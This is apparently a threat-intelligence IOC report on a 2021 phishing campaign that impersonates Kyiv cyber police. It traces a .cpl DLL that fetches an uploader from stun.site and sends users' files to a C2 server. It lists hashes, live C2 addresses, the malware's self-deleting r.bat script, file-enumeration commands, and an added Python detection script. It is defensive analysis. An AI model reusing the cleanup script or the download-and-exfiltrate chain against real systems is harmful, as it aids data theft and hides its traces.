VRad

#autoit_171221

Dec 17th, 2021 (edited)
#IOC #OptiData #VR #Autoit #DLL #TA471 #uploader

https://pastebin.com/rYsMt3vH

previous_contact:
24/07/21 https://pastebin.com/qHHUgBNK
12/04/21 https://pastebin.com/yBpP4PPw

FAQ:
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083

attack_vector
--------------
email > attach .rar > pdf.cpl (Win32 DLL, loaded via control.exe/rundll32) > GET stun.site/zepok101.exe > Users\Public\svchosts.exe > exfil to 185.244.41.109

email_headers
--------------
List-Id: <tobnosimey.outlook.com>
From: Управління протидії кіберзлочинам в місті Києві <police387@npu.gov.ua> <tobnosimey@outlook.com>
  (display name: "Cybercrime Countermeasures Department, City of Kyiv"; the npu.gov.ua address is part of the display name only, the actual sender address is tobnosimey@outlook.com, matching Return-Path and X-OriginatorOrg)
Subject: re: Повідомлення про підозру у порушенні закону ("Notice of suspicion of a violation of the law")
Date: Fri, 17 Dec 2021 16:10:00 +0300
Return-Path: tobnosimey@outlook.com
X-OriginatorOrg: outlook.com

files
--------------
SHA-256 ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0
File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.rar [ RAR archive data ]
  (file name translates to "pdf - Example of filling in the explanatory note, text is filled in by hand.rar")
File size 10.87 KB (11130 bytes)

SHA-256 a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7
File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.cpl [ Win32 DLL ]
  (same name as the archive, with the .cpl extension)
File size 10.50 KB (10752 bytes)

SHA-256 7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8
File name zepok101.exe (svchosts.exe) [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ASProtect v1.23 RC1 ]
File size 2.52 MB (2641264 bytes)

SHA-256 6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a
File name zepok101_unpack.bin [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ]
File size 4.93 MB (5169152 bytes)

activity
**************
PL_SCR https://stun.site/zepok101.exe ( 37.9.13.206:443 )

C2 185.244.41.109:8080/upld/

Anti-VM
**************
+ Detects Sandboxie through the presence of a library
+ Checks the BIOS version, possibly for anti-virtualization [\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion]
+ Detects VirtualBox through the presence of a registry key [ HKLM\HARDWARE\ACPI\DSDT\VBOX__ ]

netwrk
--------------
185.244.41.109:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

comp
--------------
rundll32.exe 2672 TCP 37.9.13.206 443 ESTABLISHED
svchosts.exe 2720 TCP 185.244.41.109 8080 ESTABLISHED

proc
--------------
"C:\Windows\System32\control.exe" "C:\Users\operator\Desktop\pdf_DLL.cpl",
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\operator\Desktop\pdf_DLL.cpl",
C:\Users\Public\svchosts.exe
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.csv" /S /B /A
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
...
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A

C:\Windows\system32\cmd.exe cmd /c start /min r.bat
C:\Windows\system32\cmd.exe /K r.bat
C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\Public\r.bat"
C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F

persist
--------------
n/a

drop
--------------
C:\Users\Public\svchosts.exe
C:\Users\Public\r.bat

r.bat
--------------
@echo off
:tryrem
del svchosts.exe
if exist svchosts.exe (goto tryrem)
start /b "" cmd /min /c del "%~f0"& Taskkill /IM cmd.exe /F&exit /b


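Added example, not part of the original paste: detection logic for the proc, netwrk and r.bat artefacts above, run over constructed log lines that mirror those sections. Because r.bat deletes svchosts.exe and then itself, the dropped files are usually gone by the time anyone looks, so the rules key on what survives in telemetry: a .cpl launched from a user path, an executable under C:\Users\Public with a svchost look-alike name, the per-extension DIR /S /B /A enumeration burst, and the WinHttpRequest POST to /upld/. The `kind|payload` line layout, the rule names and the sample lines are assumptions for the example.

```python
"""Detection rules for the uploader chain in this report.

Added example; not code from the original paste. Log lines are constructed
to mirror the page's proc/netwrk sections; the "kind|payload" layout is an
assumption, as are the rule names.
"""
import re
from collections import Counter

# Atomic network IOCs taken from the paste (payload host and C2).
C2_INDICATORS = {"185.244.41.109", "37.9.13.206", "stun.site"}

# Rule: control panel item (.cpl) launched from a path under C:\Users\.
_CPL_RUN = re.compile(
    r'(?i)(control\.exe|rundll32\.exe).*?["\s]([a-z]:\\users\\[^"]+?\.cpl)')
# Rule: cmd /U /C DIR "<dir>\*.<ext>" /S /B /A, the per-extension file sweep.
_DIR_ENUM = re.compile(
    r'(?i)cmd\.exe\s+/U\s+/C\s+DIR\s+"[^"]*\*\.[a-z0-9]+"\s+/S\s+/B\s+/A')
# Rule: an executable started from C:\Users\Public (world-writable, no user profile).
_PUBLIC_EXE = re.compile(r'(?i)^"?c:\\users\\public\\([^"\\]+\.exe)"?')
# Rule: WinHttpRequest user agent POSTing to the /upld/ path seen on the C2.
_UPLOAD_POST = re.compile(r'(?i)POST\s+/upld/\S*.*WinHttp\.WinHttpRequest\.5')


def process_findings(cmdline: str) -> list:
    """Return the names of the rules a single process command line trips."""
    hits = []
    if _CPL_RUN.search(cmdline):
        hits.append("cpl_from_user_path")
    if _DIR_ENUM.search(cmdline):
        hits.append("dir_enum")
    m = _PUBLIC_EXE.search(cmdline)
    if m:
        hits.append("exe_from_users_public")
        name = m.group(1).lower()
        # svchosts.exe, svchost32.exe etc.: named to blend in, but not the real binary.
        if name.startswith("svchost") and name != "svchost.exe":
            hits.append("svchost_lookalike")
    return hits


def network_findings(line: str) -> list:
    """Return the names of the rules a single proxy/flow record trips."""
    hits = []
    if _UPLOAD_POST.search(line):
        hits.append("winhttp_upload_post")
    if any(ioc in line for ioc in C2_INDICATORS):
        hits.append("known_c2")
    return hits


def scan(lines) -> Counter:
    """Count rule hits over "kind|payload" records (kind is proc or net)."""
    hits = Counter()
    for line in lines:
        kind, _, payload = line.partition("|")
        if kind == "proc":
            hits.update(process_findings(payload))
        elif kind == "net":
            hits.update(network_findings(payload))
    return hits


def chain_matched(hits: Counter, min_enum: int = 3) -> bool:
    """True when the stages line up the way this report describes them:
    .cpl stage, payload under Users\\Public, a DIR sweep over several
    extensions, and either the upload POST or a known C2 address."""
    return bool(hits["cpl_from_user_path"]
                and hits["exe_from_users_public"]
                and hits["dir_enum"] >= min_enum
                and (hits["winhttp_upload_post"] or hits["known_c2"]))


# Constructed sample: the proc/netwrk lines from this report plus two benign records.
SAMPLE_LOG = [
    'proc|"C:\\Windows\\System32\\control.exe" "C:\\Users\\operator\\Desktop\\pdf_DLL.cpl",',
    'proc|"C:\\Windows\\system32\\rundll32.exe" Shell32.dll,Control_RunDLL "C:\\Users\\operator\\Desktop\\pdf_DLL.cpl",',
    'proc|C:\\Users\\Public\\svchosts.exe',
    'proc|C:\\Windows\\system32\\cmd.exe /U /C DIR "\\Users\\operator\\*.csv" /S /B /A',
    'proc|C:\\Windows\\system32\\cmd.exe /U /C DIR "\\Users\\operator\\*.doc" /S /B /A',
    'proc|C:\\Windows\\system32\\cmd.exe /U /C DIR "\\Users\\operator\\*.pdf" /S /B /A',
    'proc|C:\\Windows\\system32\\cmd.exe /U /C DIR "\\Users\\operator\\*.7z" /S /B /A',
    'proc|"C:\\Windows\\System32\\notepad.exe" C:\\Users\\operator\\notes.txt',
    'net|185.244.41.109:8080 POST /upld/AC38D1C7 HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)',
    'net|40.97.1.1:443 GET /owa/ HTTP/1.1 Mozilla/5.0',
]

if __name__ == "__main__":
    counts = scan(SAMPLE_LOG)
    for rule, n in sorted(counts.items()):
        print(f"{rule:24s} {n}")
    print("chain matched:", chain_matched(counts))
```

The DIR rule alone is noisy on admin hosts; the chain check requires it together with the .cpl launch and the Users\Public executable, which is what separates this sample's behaviour from a scripted inventory. Add the SHA-256 values from the files section as a separate hash match where file hashes are available in the telemetry.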
Files details
--------------
RAR https://www.virustotal.com/gui/file/ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0/details
DLL https://www.virustotal.com/gui/file/a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7/details
EXE https://www.virustotal.com/gui/file/7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8/details
EXE_unp https://www.virustotal.com/gui/file/6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a/details

DLL https://www.unpac.me/results/89a184de-0712-4673-8238-f9ecd86c7362
EXE https://www.unpac.me/results/40da648c-cf5e-4d13-ad39-5a42b087d945

DLL https://analyze.intezer.com/analyses/159836bf-8ed5-4b6c-8ffa-e3c28f51f181
EXE https://analyze.intezer.com/analyses/35f76754-f612-4306-924b-3f47cb862e83
EXE_unp https://analyze.intezer.com/analyses/985987ff-81cb-4a88-b4a7-413f793c6744

VR
